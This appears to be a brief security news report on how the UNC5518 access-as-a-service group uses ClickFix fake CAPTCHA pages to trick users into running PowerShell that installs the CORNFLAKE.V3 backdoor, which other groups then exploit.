ClickFix & fake CAPTCHAs facilitate CORNFLAKE.V3 deployment

Threat actors have been observed employing a deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3. Google-owned Mandiant has described this activity, tracked as UNC5518, as part of an access-as-a-service scheme that utilises fake CAPTCHA pages to lure users into providing initial access to their systems. This access is subsequently monetised by other threat groups. The initial infection vector, referred to as ClickFix, involves enticing users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box. The access provided by UNC5518 is believed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and deliver additional payloads.

The attack chain typically begins when a victim lands on a fake CAPTCHA verification page after interacting with search results that utilise search engine optimisation (SEO) poisoning or malicious advertisements. The user is then tricked into executing a malicious PowerShell command, which launches the next-stage dropper payload from a remote server. The newly downloaded script checks if it is running within a virtualised environment and ultimately activates CORNFLAKE.V3. Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of various payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server, with traffic proxied through Cloudflare tunnels to evade detection.